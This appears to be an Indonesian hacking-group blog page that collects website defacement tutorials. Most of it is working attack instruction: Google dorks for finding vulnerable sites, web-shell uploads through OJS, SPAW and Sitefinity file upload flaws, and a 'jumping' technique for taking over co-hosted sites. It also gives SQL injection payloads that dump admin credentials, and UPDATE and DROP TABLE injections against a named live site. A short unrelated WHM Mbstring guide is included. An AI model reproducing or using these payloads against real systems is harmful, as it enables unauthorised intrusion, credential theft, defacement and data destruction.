Jumat, 13 Juli 2018

EXPLOID

DEFACE JOMBANG



Exploit-ID adalah Indone­sian Exploit Archive yang mem­pun­yai tujuan untuk berbagi ten­tang hal kea­manan di bidang jaringan dan kom­puter. Awal berdiri Exploi-ID meru­pakan keti­dak­sen­ga­jaan founder per­tama yang mem­pun­yai cita-cita untuk mem­buat sebuah archive exploit. Dari ide terse­but terny­ata men­da­pat respon posi­tif dari beber­apa senior hacker di Indone­sia, sehingga dapat ter­ben­tuk­lah team untuk meng­garap Exploit-ID. Semoga Exploit-ID dapat men­jadi solusi arsip exploit yang berguna
Admin…
Exploit-ID is the Indonesian Exploit Archive which has the objective to share about security in the area of network and computer. Initial stand Exploi-ID is the founder of the first accident that has aspirations to create an archive exploit. From that idea has received positive responses from some senior hackers in Indonesia, so as to forming a team to work on the Exploit-ID. Hopefully Exploit-ID can be a useful solution for the exploits archive
Admin …

Deface metode OJS

Deface metode OJS

 
 
Kali ini w akan share Cara Deface OJS (Open Journal System) . bisa di bilang teknik ini ribet >:(  . karena harus mengregistrasi dulu :3

Dork : intext:Journal "new submission"
inurl:/index.php/index/user/register
intext:about submission "Journal"
inurl:/index.php/ojs

*Yang laen use your dick eh brain :v

Tutorial :

1.Kamu harus mendaftar dulu disini > site,com/index.php/index/user/register
-Jangan Lupa untuk mencentang Registrasi sebabagi Author / penulis & Jangan ceklis Email konfimasi
2. Setelah Registasi Klik "New Submission"
3. Selesaikan Step 1
4. Di Step 2, kamu dapat upload shell (contoh format shell : a.phtml)
5.Jika Sukses ! maka akan muncul seperti ini
6.Cari akses shell nya

Penjelasan : 
Filename : 4-4-1-SM.phtml
4 = id user u

Shell Path : 
http://www.contoh.com/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml

Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml

Yap itu sedikit info tentang OJS
Semoga bermanfaat :v

Tutorial Deface SQL Injection Manual

Tutorial Deface SQL Injection Manual

Hai Guys :)
 Ketemu lagi dengan Saya :) ^_^
kali ini kita akan membahas tentang Tutorial Cara SQL Manual / SQLI istilahnya ya :v

Oke pertama kita dork dulu ya :)
Dorknya:
inrul:/news.php?id= site:com .net .id

kembangi dengan Otak Vokers kau

Sekarang kita two the poin aja
target saya uda ada :)
Nah ini Target saya :)
Pertama kamu harus tambahkan sesuatu seperti (')
kan Web nya Blank berarti Vuln
sekarang kamu cari ordernya
contoh : 
+order+by+1--+ ( no blank )

+order+by+2--+ (no blank )
+order+by+7--+ (no blank)
+order+by+9--+ (blank)
cari dia sampai Blank 
kan Blank dia No 8
 nah kalian skrng https://site.com/berita.php?id=100'+union+select+1,2,3,4,5,6,7--+
untuk mecari angka togel :v
alian data bases nya
Ketemu kan Angka togelnya yang No. 2
sekarang kita Masukan Dios nya
https://site.com/berita.php?id=100'+union+select+1,Concat(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)
,3,4,5,6,7--+
kan ada no .2 itu kita ganti no.2 itu dengan Dios nya :)
nah kayak gini contoh nya tadi :)
sekarang kita akan mencari UserName dan Paswoard

yang Dios itu yang tadi ganti sama
https://site.com/berita.php?id=100'+union+select+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(h14471_13102016
.user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)0
,3,4,5,6,7--+
nah ketemu kan username nya sama paswoard nya
kalau menemukan admin login pakai Otak kalian

Sekian Dari saya :)

Cara Deface Metode Spaw Uploads

Cara Deface Metode Spaw Uploads

 





 

Langsung aja yo:

1. Dork:
inurl:”spaw2/uploads/files/”




Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p


Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. jadi begini: inurl:”spaw2/uploads/files/” site:th


2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

 3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

sehingga menjadi seperti ini


http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file 

4. nanti page web target anda akan menjadi seperti gambar dibawah ini :





Jika sudah Klik Upload.
Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.



Tinggal Klik File sobat ~> Nanti akan muncul semacam info file ~> lalu Klik Download file ~> nanti akan muncul halaman Deface sobat

Done :p



Sekian tutorial sederhana untuk hari ini dari saya >.<
Mohon maaf bila ada salah kata / teknis ;)

Semoga bermanfaat.

Tutorial deface teknik site finity android

Tutorial deface teknik site finity android

Tutorial deface di android dengan metode site finity
Yoo mamang kali ini gua  akan memberikan tutorial cara deface di android dengan metode site finity,
sebelumnya kalian udah tau kan apa itu deface?? kalo gatau mate j y lo hhh
kalau udah tau langsung saja simak tutorialnya:D
perhatian!!! kalian harus punya script deface nya dulu kalau tidak gimana mau deface nya??
1.buka browser kalian apa saja terserah lalu ke google

2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search

3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut 
(sitefinity/usercontrols/dialogs/documenteditordialog.aspx) tanpa buka tutup kurung! contoh 
http://sitetarget.org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian

5.klik yang di bawah nya tunggu sampai loading selesai

6.tambah link target tadi dengan (/files) contoh http://sitetarget.org/files/namascriptdefacekalian.html lalu klik search
7.Selese :v




SELAMAT MENCOBA

Deface Teknik Jumping

MAS PINK HIDEN CYBER




Deface Teknik Jumping


Wasap gaes..
Yap kali ini gw akan share tutorial deface dengan teknik jumping, bagi kalian yang belum mengerti apa itu jumping? apa itu kegunaan jumping? kali ini ane akan sedikit bahas tentang metod jumping
Yok langsung saja :v
Apa itu jumping? 
Jumping adalah ketika kita deface suatu web yang memiliki beberapa web/situs yang berada di 1 server
Apa kegunaan jumping?
Biar lu panen web xD xD :v
Bahan-Bahan :
Shell yang sudah ketanem
Kopi sama rokok :v
Shell yang ada filtur jumping nya tentunya 
Langkah pertama !!
Pastikan shell lu ada filtur jumping nya
Nah kita bisa lihat banyak web yg bisa dijump :v
Nah selanjutnya kita klik config, untuk menggambil domain yang akan kita eksekusi
Kemudian kita klik config/hajar!!
Kemudian kita klik home, pilih folder config shell kalian
\
Kemudian kita pilih auto edit user sebagai u/p untuk login ke web panel admin
NB: Tools ini work jika dijalankan di dalam folder config
Kemudian klik hajar!!
Jika sudah akan muncul tampilan seperti ini, :v tinggal kita klik link nya
Masukin u/p yang sudah kita edit tadi
Yaap! Itulah sedikit ilmu/tutor dari saya tentang poc jumping shell :v
Semoga bermanfaat :v
Terimakasih ^_^
Greetz :
All Member Hacker Patah Hati

Menembus Password Login Menggunakan SQL Injection

HACKER JOMBANG

Menembus Password Login Menggunakan SQL Injection

Author: Mas Pink Hacker Jombang · Category: Algoritma, Pemograman, Tool, Database, Internet dan Web, Jaringan Komputer, Keamanan dan Hacking, Komputer Dasar 



Pada tulisan ini saya akan jelaskan tentang cara menembus password login dengan SQL injection
secara teoritis dengan melihat pada sisi kelemahan query bahasa SQL itu sendiri. SQL injection itu
sendiri adalah suatu cara untuk mengeksploitasi kelemahan bahasa SQL dengan cara memasukkan
(menginjeksikan) beberapa karakter tertentu. Deretan karakter tersebut biasa dikenal dengan nama
injection string. Ada banyak hal yang dapat dilakukan dengan injection string. Diantaranya,
mem-bypass password, mendapatkan nama tabel, menyisipkan anggota baru, dll, bahkan sampai
menghapus tabel pada suatu database.
Download Tulisan Lengkap: Mas Pink Hacke defAce-konsep-sql-menembus-login-dengan-sql-injection.pdf

Related Articles

  1. Aktifkan Multibyte String (Mbstring) Di WHM
  2. Kesalahan Umum dalam Membuat Password
  3. Membuat Password yang Handal
  4. Lama Waktu untuk Membongkar Password
  5. Mengganti Password Administrator pada Windows
  6. Tipe-Tipe Data Oracle 11g
  7. Strategi & Manajemen Password
  8. Penerapan Hill Chiper Pada Kemanan Pesan Teks
  9. Perbedaan Password, Passphrase, dan Passcode
  10. MD5 (Message-Digest algortihm 5)
  11. Trik Matikan Komputer Dengan Klik Kanan
  12. Penggunaan Enkripsi MD5 di Visual Basic
  13. Pengaturan Password di Aplikasi Web yang Dihasilkan oleh PHPMaker
  14. Mengetik Bahasa Arab di Windows XP
  15. Keamanan Wireless LAN
  16. Membuat Shortcut Pembuatan Table di Microsoft Word dengan Visual Basic Editor
  17. Penerjemah Bahasa Menggunakan PHP
  18. Cara Membuat Database di MySQL
  19. Mengganti Password Akun Windows dari CMD
  20. Aplikasi Password VB 2010 Dengan Database Ms. Access 2007

MengAktifkan Multibyte String (Mbstring) Di WHM

MENGAKTIFKAN MULTIBYTE STRING DI WHM

MAS PINK HACKER DEFACE JOMBANG

WHITE HATE CYBER HACKER

HACKER JOMBANG TEAM JAWA TIMUR







MengAktifkan Multibyte String (Mbstring) Di WHM

Hari ini (08/11/2017) saya selesai upload website baru yang dibangun menggunakan CMS wordpress, namun terjadi kenadala sedikit karena salah satu plugin tidak berjalan normal, pesan error yang muncul :
Fatal error: Call to undefined function mb_list_encodings() in /home/xxxxxx/public_html/wp-includes/SimplePie/Misc.php on line 356
Tampilan error pada plugin Wordpress
            Mulailah mencari solusi melalui om google, tapi tidak banyak penjelasan berbahasa indonesia mengenai masalah diatas, namun dengan kesabaran dan ketabahan akhirnya ketemu juga solusinya.
            Singkat kata, kendala Fatal error tersebut diakibatkan oleh settingan Mbstring, oke...saya jelaskan sedikit makanan jenis yang disebut Mbstring. Mbstring merupakan singkatan dari Multi–Byte String, merupakan perpanjangan dari bahasa pemrograman PHP yang berfungsi untuk mengelola string non-ASCII dan digunakan untuk konversi string ke pengkodean yang berbeda. Skema karakter encoding multi-byte ini digunakan untuk mengekspresikan lebih dari 256 karakter dalam byte biasa sistem pengkodean. Maka tidak heran ketika menggunakan sistem yang memiliki string atau kaliamt yang dapat diterjemahkan selalu memerlukan mbstring (jika diperlukan) misalnya seperti CMS WordPress (beberapa tema / plugin).
            Cara penangannya bisa melalui cpanel atau WHM, namun untuk penjelasan saya kali ini melalui WHM, silakan login ke WHM seperti pada gambar dibawah ini

Halaman login WHM
Setelah berhasil login ke halaman WHM, cari Software >> EasyApache dalam contoh ini EasyApache pada WHM saya menggunakan EasyApache 3

Software pada WHM
Seperti  sayang saya sampaikan diatas, bahwa pada kasus ini di WHM saya menggunakan EasyApache 3, maka pada saat EasyApache 3 dipilih, akan muncul tampilan seperti pada gambar dibawah ini :

EasyApache 3
Pada bagian profile, terlihat settingan DEFAULT, pilih gambar  kemudian klik customize profile, akan muncul halaman Apache Version. Klik >>Next Step


Apache version
Selanjutnya akan muncul halaman PHP version, kemudian klik >> Next Step seperti pada gambar dibawah ini
PHP Version
Yang akan muncul selanjutnya halaman Short Options List, pada halaman ini gerakan kursor kebawah, dan cari tombol Exhaustive Options List pada kanan bawah.

Short Options List

Exhaustive Options List
Akan muncul spesifikasi pilihan, gerakan kursor kebawah dan cari Mbstring

Specific choise

Centang Mbstring
Centang kotak kecil disamping kiri Mbstring, selanjutnya klik tombol Save and Build dan akan muncul pertayaan klik I Understand
Save and Build
Jika proses sesuai dengan langkah-langkah diatas, maka akan muncul proses build, seperti pada gambar dibawah ini :

Proses build sedang berjalan
Anda memerlukan waktu sekitar 3 sampai 5 menit menunggu proses ini berjalan, dan jika semua proses berjalan dengan baik, maka tampilan paling akhir akan muncul Build Complete, seperti pada gambar dibawah ini :

Build complete
Selamat proses Mbstring telah selesai, dan saat ini Plugin pada web wordpress telah normal, pesan Fatal error: Call to undefined function mb_list_encodings() in /home/xxxxxx/public_html/wp-includes/SimplePie/Misc.php on line 356 telah hilang.

BELAJAR TEKNIK HACKING SQL INJECTIONS UNTUK PEMULA Belajar Teknik Hacking SQL Injection [Pada URL] - Untuk Pemula

BELAJAR TEKNIK HACKING SQL INJECTIONS UNTUK PEMULA

Belajar Teknik Hacking SQL Injection [Pada URL] - Untuk Pemula

Belajar Teknik Hacking SQL Injection [Pada URL]
Untuk Pemula

Pada kesempatan kali ini, saya akan mencoba menerangkan tentang serangan ke suatu website menggunakan teknik SQL Injection. Saya akan menunjukkan SQL Injection melalui URL. Pada dasarnya caranya adalah sama karena keduanya sama- sama merupakan parameter input.

Teknik untuk menemukan nama field dan table ditemukan oleh david Litcfield. Teknik yang digunakan disini adalah dengan membuat terjadinya error menggunakan perintah having 1=1

STEP 1
Oke, kita langsung masuk ke contoh nyata. Web target kita kali ini ialah :

http://www.24x7learning.com/Press_Releases/news.asp?id=57

Untuk mendapatkan nama table dan nama field pertama, ialah dengan cara memasukkan perintah dibawah ini pada browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama table = media
nama field pertama = id


STEP 2
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediadate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field kedua = mediadate



STEP 3
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediatitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field ketiga = mediatitle


STEP 4
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediapublisher' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field keempat= mediapublisher


STEP 5
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediapath' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field kelima= mediapath


STEP 6
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.ishtml' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field keenam= ishtml


STEP 7
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath,media.ishtml having 1=1

Dengan perintah tersebut, maka kita tidak akan mendapatkan pesan error apapun. Artinya, bahwa pencarian field sudah selesai.


HACKING STEP....


MERUBAH DATA
Untuk merubah data, gunakanlah command SQL yaitu UPDATE. Contohnya kita akan merubah isi dari field ”mediapublisher”, perintah lengkapnya ialah :


http://www.24x7learning.com/Press_Releases/news.asp?id=57; UPDATE media set mediapublisher=’HACKER WAS HERE’ where id=57;


Sekarang Anda coba akses alamat :

http://www.24x7learning.com/Press_Releases/news.asp?id=57

Silahkan, lihat perubahannya.


MENGHAPUS TABLE
Tindakan yang paling “extreme” ialah menghapus/ drop table. Untuk melakukannya Anda bisa menggunakan comman SQL, yaitu DROP. Perintah lengkapnya ialah :


http://www.24x7learning.com/Press_Releases/news.asp?id=57; drop table
media;

End….


Artikel ini hanya untuk tujuan pembelajaran semata. Tidak pernah dibenarkan untuk melakukan kegiatan cracking kepada suatu website. Satu hal yang perlu Anda ketahui ialah dengan melakukan deface terhadap 100 website tidak akan menjadikan Anda seorang Hacker.

 share facebook - suara.com
 share twitter - suara.com





share google plus - suara.com

HACK WEBSITE DENGAN ANDROID

HACK WEBSITE DENGAN ANDROID


Hacking Website Dengan Android. 

Sebagian besar situs yang dirusak oleh Hacker dilakukan dengan menggunakan kerentanan paling umum Yaitu SQL injection

Saya akan menggunakan Tools yang bernama
DroidSQLi. 

Penampakan DroidSQLi

Oke kita langsung aja.

1. Siapkan Handphone Android yang sudah terinstal Tools DroidSQLi Tentunya.

2. yang belum punya Tools DroidSQLi, bisa Cari sendiri ya.. Usaha dikit lah :D

3. Mencari situs yang rentan SQLi dengan Google Dork.
Google Dork Intip ---->> Disini

Oke, kita sudah mendapat target yg rentan dengan SQLi. .

Yang harus kita lakukan adalah memasukkan URL/LINK Target yang rentan SQLi

klik untuk perbesar

  • klik csb_ac_in_db

klik untuk perbesar

  • klik csb_admin

klik untuk perbesar

  • Selanjutnya, Centang username dan password admin lalu klik Get Records

klik untuk perbesar

  • Taraaaaaa.. 
Kita dapat username dan password admin .

klik untuk perbesar
username : admin
password : 4d4098d64e163d2726959455d046fd7c

password nya masih berbentuk MD5
& kita harus meng Crack password nya.

untuk meng Crack password nya
kita harus meluncur ke--->> SINI

Kita isi dengan password yang berbentuk MD5 tadi..
Isi kode Capcha & klik Sumbit.

klik untuk perbesar

Dan Hasilnya..


klik untuk perbesar